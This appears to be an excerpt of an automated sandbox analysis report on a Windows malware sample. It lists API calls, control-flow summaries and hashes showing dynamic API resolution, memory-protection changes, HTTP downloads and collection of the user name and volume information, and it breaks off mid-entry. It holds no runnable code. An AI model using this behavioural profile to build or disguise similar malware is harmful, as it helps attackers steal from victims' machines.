                          • LoadLibraryA.KERNEL32(00FD25C0,?,00036CA0), ref: 00039E1F
                          • LoadLibraryA.KERNEL32(00FD25A8,?,00036CA0), ref: 00039E30
                          • GetProcAddress.KERNEL32(75A70000,00FD2518), ref: 00039E52
                          • GetProcAddress.KERNEL32(75290000,00FD2530), ref: 00039E73
                          • GetProcAddress.KERNEL32(75290000,00FD2548), ref: 00039E8B
                          • GetProcAddress.KERNEL32(75BD0000,00FD2560), ref: 00039EAD
                          • GetProcAddress.KERNEL32(75450000,00FC5710), ref: 00039ECE
                          • GetProcAddress.KERNEL32(76E90000,00FD8F68), ref: 00039EEF
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00039F06
                          Strings
                          • NtQueryInformationProcess, xrefs: 00039EFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: d24193e7bd8e4c0e02b18605b02fceeed00b744c73819f6e875f261a63fcc2dc
                          • Instruction ID: 57dcd2df6624b08e7b87d7959b59204c207c67e5bda945de88ef74b53c3cc818
                          • Opcode Fuzzy Hash: d24193e7bd8e4c0e02b18605b02fceeed00b744c73819f6e875f261a63fcc2dc
                          • Instruction Fuzzy Hash: 1AA11BB5518200AFC384DFA8FC8C9767BB9E7497A1710863AF90AC3270DB75A955CF60
                          Function 00024610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 24610-246e5 RtlAllocateHeap 781 246f0-246f6 764->781 782 2479f-247f9 VirtualProtect 781->782 783 246fc-2479a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002465F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000247EC
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000247C0
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246D3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024707
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000247AA
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000247CB
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246B2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024763
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024784
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002479F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246A7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246C8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002471D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002467D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024712
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000247B5
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024667
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246BD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024728
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000246FC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024688
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002476E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024779
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024693
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0002478F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024672
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 30874602e8d4f4860263405ef121bb4c9c634f3b01cfbb5b7e16a754b5e1f54e
                          • Instruction ID: 2132ce8a2c0fccc9d5905121a84c95d56ff9e95e30c5d9f6acd0a71abb343e86
                          • Opcode Fuzzy Hash: 30874602e8d4f4860263405ef121bb4c9c634f3b01cfbb5b7e16a754b5e1f54e
                          • Instruction Fuzzy Hash: 7941E6A07C1607EFE634F7E49F42D9F76555F42709F407268AA005A283CFB265074BAA
                          Function 000262D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 262d0-2635b call 3aab0 call 24800 call 3aa50 InternetOpenA StrCmpCA 1040 26364-26368 1033->1040 1041 2635d 1033->1041 1042 26559-26575 call 3aab0 call 3ab10 * 2 1040->1042 1043 2636e-26392 InternetConnectA 1040->1043 1041->1040 1062 26578-2657d 1042->1062 1045 26398-2639c 1043->1045 1046 2654f-26553 InternetCloseHandle 1043->1046 1048 263aa 1045->1048 1049 2639e-263a8 1045->1049 1046->1042 1051 263b4-263e2 HttpOpenRequestA 1048->1051 1049->1051 1053 26545-26549 InternetCloseHandle 1051->1053 1054 263e8-263ec 1051->1054 1053->1046 1056 26415-26455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 263ee-2640f InternetSetOptionA 1054->1057 1058 26457-26477 call 3aa50 call 3ab10 * 2 1056->1058 1059 2647c-2649b call 38ad0 1056->1059 1057->1056 1058->1062 1067 26519-26539 call 3aa50 call 3ab10 * 2 1059->1067 1068 2649d-264a4 1059->1068 1067->1062 1071 264a6-264d0 InternetReadFile 1068->1071 1072 26517-2653f InternetCloseHandle 1068->1072 1076 264d2-264d9 1071->1076 1077 264db 1071->1077 1072->1053 1076->1077 1080 264dd-26515 call 3acc0 call 3abb0 call 3ab10 1076->1080 1077->1072 1080->1071
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                          • HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0002644D
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000264BD
                          • InternetCloseHandle.WININET(00000000), ref: 0002653F
                          • InternetCloseHandle.WININET(00000000), ref: 00026549
                          • InternetCloseHandle.WININET(00000000), ref: 00026553
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 15b1ec2c06decc34ed2655b9773e212e53e965ba2da587d0098b8626743e19f2
                          • Instruction ID: d6c779a0a4fdf73dd12159934567d68b9fcef0fb8af026f9392a800133fd7027
                          • Opcode Fuzzy Hash: 15b1ec2c06decc34ed2655b9773e212e53e965ba2da587d0098b8626743e19f2
                          • Instruction Fuzzy Hash: E4717071A00228EBDB24DFA0DC59FEEB779BB45700F1081A8F50A6B191DBB56A84CF51
                          Function 00037690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 37690-376da GetWindowsDirectoryA 1357 376e3-37757 GetVolumeInformationA call 38e90 * 3 1356->1357 1358 376dc 1356->1358 1365 37768-3776f 1357->1365 1358->1357 1366 37771-3778a call 38e90 1365->1366 1367 3778c-377a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 377a9-377b6 call 3aa50 1367->1369 1370 377b8-377e8 wsprintfA call 3aa50 1367->1370 1377 3780e-3781e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000376D2
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0003770F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037793
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0003779A
                          • wsprintfA.USER32 ref: 000377D0
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 446822d93932b42abd3d0809928721297b8d5d72d1c218fbdd5f655784b4960a
                          • Instruction ID: ba4d0b82261e6441ea9b5fcb3040b3da93e86b6a84891bdf7f2682f298990d19
                          • Opcode Fuzzy Hash: 446822d93932b42abd3d0809928721297b8d5d72d1c218fbdd5f655784b4960a
                          • Instruction Fuzzy Hash: 954185B1D04348ABDB21DF94DC45BEEB7B8AF48714F104099F609AB281D7746A44CBA5
                          Function 000379E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 47d172758ee6bbb5ea4fbae740fd2b0e5c90e84b0c7237853dc8ea03030391ee
                          • Instruction ID: a2527483ef493b9a89915355cae796104312f3aa1e3da2491a4d5a3605b335a2
                          • Opcode Fuzzy Hash: 47d172758ee6bbb5ea4fbae740fd2b0e5c90e84b0c7237853dc8ea03030391ee
                          • Instruction Fuzzy Hash: D3F068B1948209EFC710DF98DD49BAEFBBCF745761F10012AFA15A3680C7751504CBA1
                          Function 00021160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: a6fc06f266b1ee8409c2d0e8d1d1f8fc50607d396417f700ec4fb3c9dd5f8fcf
                          • Instruction ID: 25a7e6f41c209e593967d200ad46108f0cbf07e58a69730014988aa8538b8303
                          • Opcode Fuzzy Hash: a6fc06f266b1ee8409c2d0e8d1d1f8fc50607d396417f700ec4fb3c9dd5f8fcf
                          • Instruction Fuzzy Hash: CCD09E7490431C9BCB04DFE0A94EAEEBB78BB08625F100565D90962240EA315455CA65
                          Function 00039F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
